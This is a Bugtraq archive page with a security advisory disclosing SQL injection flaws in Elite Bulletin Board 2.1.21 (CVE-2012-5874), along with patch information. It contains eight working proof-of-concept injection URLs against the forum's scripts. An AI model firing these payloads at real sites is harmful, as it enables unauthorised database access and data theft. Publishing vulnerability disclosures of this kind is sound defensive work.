[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Multiple SQL Injection Vulnerabilities in Elite Bulletin Board

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Multiple SQL Injection Vulnerabilities in Elite Bulletin Board
From: advisory@xxxxxxxxxxxx
Date: Wed, 19 Dec 2012 12:44:48 +0100 (CET)

Advisory ID: HTB23133
Product: Elite Bulletin Board
Vendor: elite-board.us
Vulnerable Version(s): 2.1.21 and probably prior
Tested Version: 2.1.21
Vendor Notification: November 28, 2012 
Vendor Patch: December 6, 2012 
Public Disclosure: December 19, 2012 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2012-5874
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Risk Level: High 
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in 
Elite Bulletin Board, which can be exploited to perform SQL injection attacks.


1) Multiple SQL injection vulnerabilities in Elite Bulletin Board: CVE-2012-5874

The vulnerabilities exist due to insufficient sanitation of user-supplied data 
in URI in the "update_whosonline_reg()" and "update_whosonline_guest()" 
functions within the "/includes/user_function.php" script. 

A remote attacker can send a specially crafted HTTP request to one of the 
following scripts and execute arbitrary SQL commands in application's database: 
- checkuser.php
- groups.php
- index.php
- login.php
- quicklogin.php
- register.php
- Search.php
- viewboard.php 
- viewtopic.php

Successful exploitation of the vulnerabilities may allow attacker to extract 
sensitive data from the application's database, and even get complete control 
over the application under certain conditions (such as insecure configuration 
of database and web servers).

The following PoC (Proof of Concept) codes demonstrate the vulnerabilities by 
displaying version of the MySQL server:


http://[host]/checkuser.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_co
 nst%28version%28%29,1%29%29a%29%29%29%20--%20/

http://[host]/groups.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_const
 %28version%28%29,1%29%29a%29%29%29%20--%20/

http://[host]/index.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_const%
 28version%28%29,1%29%29a%29%29%29%20--%20/

http://[host]/login.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_const%
 28version%28%29,1%29%29a%29%29%29%20--%20/

http://[host]/quicklogin.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_c
 onst%28version%28%29,1%29%29a%29%29%29%20--%20/

http://[host]/register.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_con
 st%28version%28%29,1%29%29a%29%29%29%20--%20/

http://[host]/viewboard.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_co
 nst%28version%28%29,1%29%29a%29%29%29%20--%20/?bid=2

http://[host]/viewtopic.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_co
 nst%28version%28%29,1%29%29a%29%29%29%20--%20/?bid=2&tid=1


-----------------------------------------------------------------------------------------------

Solution:

Upgrade to Elite Bulletin Board v2.1.22

More Information:
http://elite-board.us/Community/viewtopic.php?bid=1&tid=310
http://sourceforge.net/projects/elite-board/files/Elite%20Bulletin%20Board%20v2/2.1.22/

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23133 - 
https://www.htbridge.com/advisory/HTB23133 - Multiple SQL Injection 
Vulnerabilities in Elite Bulletin Board.
[2] Elite Bulletin Board - http://elite-board.us/ - Elite Bulletin Board is an 
advanced Bulletin Board program that provides advanced features such as 
CAPTCHA, sub-board, skinning ability, multilingual, commercial password 
encryption, and much more.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types. 

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.

Prev by Date: Local root exploit for Centrify Deployment Manager < v2.1.0.283 local root
Next by Date: Firefly MediaServer Multiple Remote DoS Vulnerabilities
Previous by thread: Local root exploit for Centrify Deployment Manager < v2.1.0.283 local root
Next by thread: Firefly MediaServer Multiple Remote DoS Vulnerabilities
Index(es):
- Date
- Thread